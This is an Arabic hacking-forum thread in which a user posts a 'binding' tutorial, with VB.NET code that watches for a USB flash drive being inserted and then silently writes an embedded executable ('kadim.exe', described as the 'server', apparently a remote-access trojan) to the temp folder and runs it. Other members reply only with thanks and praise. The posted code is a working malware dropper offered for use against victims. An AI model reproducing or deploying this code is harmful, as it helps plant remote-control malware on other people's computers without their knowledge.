1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : KaDiM aL-iRaQi | المشاهدات : 564 | الردود : 15
الوسوم:
حالة الموضوع:
مغلق
  1. KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    50
    [​IMG]
    [​IMG]

    بسسم الله الرحمن الرحيم~..


    كيف الحال محبين وعشأق التلغيم~..


    بعد غيآب أيأم قليله نعود آليكم ~..


    بـتلغيمه شرطية ~..


    وهي عند أدخآأل آلفلاش يتم تشغيل السيرفر ~..


    آنشآء آلله تعجبكم ألتلغيمهَ نـتـركـكـم لمشآهده الفديوَ ~..

    [​IMG]
    [​IMG]

    [​IMG]

    آلكود آلموجود في آلشرح . ."


    Private Const WM_DEVICECHANGE As Integer = &H219
    Private Const DBT_DEVICEARRIVAL As Integer = &H8000
    Private Const DBT_DEVICEREMOVECOMPLETE As Integer = &H8004


    Protected Overrides Sub WndProc(ByRef m As System.Windows.Forms.Message)
    If m.Msg = WM_DEVICECHANGE Then
    If m.WParam.ToInt32 = DBT_DEVICEARRIVAL Then
    MsgBox("ادخال الفلاش")

    Dim kadim = IO.Path.GetTempPath & "\" & "kadim.exe"
    IO.File.WriteAllBytes(kadim, My.Resources.IRAQ2)
    Process.Start(kadim)

    ElseIf m.WParam.ToInt32 = DBT_DEVICEREMOVECOMPLETE Then
    MsgBox("اخراج الفلاش")
    End If
    End If
    MyBase.WndProc(m)
    End Sub​


    [​IMG]

    فــي آمــآن آلــلــه
     
    1 person likes this.
  2. T3BaN_HaCkEr Developer

    الأنتساب:
    ‏11 نوفمبر 2011
    المشاركات:
    59
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    Palestinian
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    بارك الله فيك

    وجزاك الله خيرا


    شرح جميل ومفيد
     
  3. فيصــــــــل Developer

    الأنتساب:
    ‏3 أغسطس 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    السعودية
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    تســلم ايديك يالغالي جاري المشاهده
     
  4. wesker Hacker Developer

    الأنتساب:
    ‏12 يناير 2013
    المشاركات:
    48
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    السلام عليكم ورحمة الله وبركاته
    موضوع رائع منك سلمت اناملك
    بارك الله فيك
    واصل من الافضل للأفضل
     
  5. ~iRaQi-Hacker~ Developer

    الأنتساب:
    ‏7 نوفمبر 2014
    المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    مششكوٍر قلبي ، آبدآع متوآصل ، تألق دآئم ، = {1$0}[​IMG]{1$0}
     
  6. Oth Màn Developer

    الأنتساب:
    ‏9 نوفمبر 2014
    المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    طالب
    الإقامة:
    C:/Windows/Morocco
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    رااائع استمر حبيبي
     
  7. Zero-737 Developer

    الأنتساب:
    ‏15 نوفمبر 2012
    المشاركات:
    108
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    شكراً لك أخي وماقصرت :{1!}:
     
  8. General Rahmane Developer plus DeveloPer Plus

    الأنتساب:
    ‏31 أكتوبر 2014
    المشاركات:
    225
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    سلمت يداك ياغالي

    شرح جميل جداً

    :{11}: :{11}:
     
  9. مسلم السيلاوي DeveloPer Plus

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    154
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    احسنت وبارك الله فيك حبي
     
  10. Mr3amo Developer

    الأنتساب:
    ‏20 أكتوبر 2014
    المشاركات:
    10
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    بارك الله فيك
    :{12}::{12}::{12}::{12}:
    وجزاك الله خيرا
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة